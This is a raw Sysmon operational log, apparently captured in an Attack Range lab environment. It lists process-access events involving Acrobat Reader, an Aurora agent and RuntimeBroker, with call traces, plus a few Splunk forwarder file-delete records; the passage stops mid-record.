10341000x800000000000000046758Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:04.308{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046757Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:04.308{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046756Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:04.308{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000046755Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:04.187{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E07FAB0CE1240355B7E2D9D904C41BD8,SHA256=18E231A99C6A78180BF46A3A94D3DC3D6315F5B596AD93D32C64C0FC5C3DECD9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046754Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:04.124{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046753Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:04.124{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046752Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:04.124{FE4C2B44-DDF7-63C7-B204-00000000AF02}48483128C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07 23542300x800000000000000018709Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:04.247{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018712Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:05.717{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AF056562F0CFA2AA61F4DEBF1A597AF,SHA256=9C9EAEFEAC5ADA2502216782905415AF3DF689B60DCEF1D6B39C8DAAA86345C5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046796Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.870{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046795Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.870{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046794Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.839{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046793Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.839{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046792Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.839{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046791Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.823{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046790Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.823{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046789Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.823{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046788Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.823{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046787Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.823{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046786Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.823{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader 